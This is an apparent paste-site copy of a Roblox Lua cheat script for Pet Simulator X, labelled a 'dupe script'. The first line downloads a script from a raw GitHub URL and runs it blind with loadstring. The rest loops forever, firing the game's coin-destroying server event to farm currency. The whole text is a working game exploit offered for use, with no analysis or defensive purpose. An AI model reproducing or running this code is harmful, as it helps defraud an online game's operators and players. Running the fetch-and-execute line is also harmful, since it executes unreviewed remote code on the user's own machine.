Facebook
From Capacious Armadillo, 1 Year ago, written in Plain Text.
This paste is a reply to Re: Re: Pet Simulator X Dupe Script from Eratic Terrapin - view diff
Embed
Download Paste or View Raw
Hits: 365
  1. loadstring(game:HttpGet("https://raw.githubusercontent.com/fikury/dupescripts/main/PetSimulatorX"))()
  2.  
  3. --Tutorial : https://youtu.be/q2kLiSdZ5Bg
  4. while true do
  5.  
  6. local args = {
  7.     [1] = "DiamondCoin",
  8.     [2] = "id936323",
  9.     [3] = game:GetService("Players").LocalPlayer
  10. }
  11.  
  12. game:GetService("ReplicatedStorage").Framework.Network.DestoryCoinServer:FireServer(unpack(args))
  13.  
  14. wait()
  15. end